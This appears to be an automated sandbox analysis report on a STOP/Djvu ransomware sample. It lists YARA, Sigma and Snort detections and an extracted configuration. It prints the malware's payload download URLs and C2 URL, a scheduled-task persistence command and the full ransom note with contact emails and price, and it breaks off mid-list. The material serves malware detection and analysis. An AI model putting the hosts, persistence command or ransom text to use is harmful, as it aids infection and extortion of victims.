21.2.sIQywRNC5M.exe.5df15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.2.sIQywRNC5M.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.2.sIQywRNC5M.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.2.sIQywRNC5M.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.2.sIQywRNC5M.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.2.sIQywRNC5M.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.2.sIQywRNC5M.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
24.2.sIQywRNC5M.exe.5db15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
24.2.sIQywRNC5M.exe.5db15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
24.2.sIQywRNC5M.exe.5db15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.sIQywRNC5M.exe.5e915a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.sIQywRNC5M.exe.5e915a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
6.2.sIQywRNC5M.exe.5e915a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
4.2.sIQywRNC5M.exe.5d815a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
4.2.sIQywRNC5M.exe.5d815a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
4.2.sIQywRNC5M.exe.5d815a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
21.2.sIQywRNC5M.exe.5df15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
21.2.sIQywRNC5M.exe.5df15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
21.2.sIQywRNC5M.exe.5df15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
22.2.sIQywRNC5M.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
22.2.sIQywRNC5M.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
22.2.sIQywRNC5M.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.2.sIQywRNC5M.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.2.sIQywRNC5M.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.2.sIQywRNC5M.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
6.2.sIQywRNC5M.exe.5e915a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.sIQywRNC5M.exe.5e915a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
6.2.sIQywRNC5M.exe.5e915a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.sIQywRNC5M.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.sIQywRNC5M.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
25.2.sIQywRNC5M.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.2.sIQywRNC5M.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.2.sIQywRNC5M.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.2.sIQywRNC5M.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.sIQywRNC5M.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.sIQywRNC5M.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
25.2.sIQywRNC5M.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.sIQywRNC5M.exe.5dc15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.sIQywRNC5M.exe.5dc15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.sIQywRNC5M.exe.5dc15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
4.2.sIQywRNC5M.exe.5d815a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
4.2.sIQywRNC5M.exe.5d815a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
4.2.sIQywRNC5M.exe.5d815a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
7.2.sIQywRNC5M.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
7.2.sIQywRNC5M.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
7.2.sIQywRNC5M.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.sIQywRNC5M.exe.5dc15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.sIQywRNC5M.exe.5dc15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.sIQywRNC5M.exe.5dc15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Click to see the 115 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\sIQywRNC5M.exe, ProcessId: 3624, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe" , ParentImage: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe, ParentProcessId: 1292, ParentProcessName: build3.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", ProcessId: 3116, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Snort Signatures

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.5 - Destination IP: 63.143.98.185

Timestamp:	04/24/24-14:47:08.267374
SID:	2036333
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.5 - Destination IP: 201.103.73.225

Timestamp:	04/24/24-14:47:05.824651
SID:	2020826
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 63.143.98.185 - Destination IP: 192.168.2.5

Timestamp:	04/24/24-14:47:07.018941
SID:	2036335
Source Port:	80
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.5 - Destination IP: 201.103.73.225

Timestamp:	04/24/24-14:47:05.824651
SID:	2036333
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 63.143.98.185 - Destination IP: 192.168.2.5

Timestamp:	04/24/24-14:47:07.014793
SID:	2036335
Source Port:	80
Destination Port:	49709
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN STOP Ransomware CnC Activity - Source IP: 192.168.2.5 - Destination IP: 63.143.98.185

Timestamp:	04/24/24-14:47:06.124117
SID:	2833438
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.5 - Destination IP: 63.143.98.185

Timestamp:	04/24/24-14:47:08.267374
SID:	2020826
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: sIQywRNC5M.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://autodiscover.com/autodiscover/autodiscover.xml	URL Reputation: Label: phishing
Source: http://sdfjhuz.com/dl/build2.exe$run	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe

Avira: detection malicious, Label: HEUR/AGEN.1313019

Found malware configuration

Source: 00000004.00000002.2052330651.0000000005D80000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", 